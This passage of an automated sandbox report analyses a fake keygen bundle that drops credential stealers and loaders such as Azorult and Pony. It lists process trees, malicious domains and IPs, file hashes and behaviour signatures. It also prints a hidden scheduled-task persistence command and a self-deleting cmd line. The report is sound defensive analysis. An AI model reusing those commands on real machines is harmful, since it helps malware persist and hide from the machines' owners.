C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 136

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 186.2.171.3:80 186.2.171.3 tcp
RU 186.2.171.3:443 186.2.171.3 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 172.67.149.76:443 2no.co tcp
SG 37.0.10.214:80 tcp
UA 194.145.227.161:80 tcp
SG 37.0.10.244:80 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp
UA 194.145.227.161:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/2772-45-0x0000000000E70000-0x0000000001046000-memory.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/3012-69-0x000000013FDE0000-0x000000013FDF0000-memory.dmp

memory/2484-70-0x00000000009A0000-0x00000000009A8000-memory.dmp

\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/1508-71-0x0000000000240000-0x0000000000260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/1624-97-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1624-96-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1512-99-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1508-100-0x00000000002F0000-0x000000000030A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA11.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1512-120-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2876-119-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/1512-124-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3012-125-0x0000000000560000-0x000000000056E000-memory.dmp

memory/2968-132-0x000000013F180000-0x000000013F190000-memory.dmp

memory/1512-134-0x0000000000400000-0x0000000000667000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/2068-153-0x0000000000400000-0x0000000002B4E000-memory.dmp

memory/1712-167-0x0000000000160000-0x000000000017E000-memory.dmp

memory/1712-168-0x00000000001F0000-0x000000000020A000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/2428-193-0x000000013FB20000-0x000000013FB26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarE54.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2296 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2296 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3164 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3164 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 163.109.116.89.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp

Files

memory/2296-0-0x0000000000EC0000-0x0000000000ED8000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

62s

Max time network

149s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Pony family

pony

Pony,Fareit

rat spyware stealer pony

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
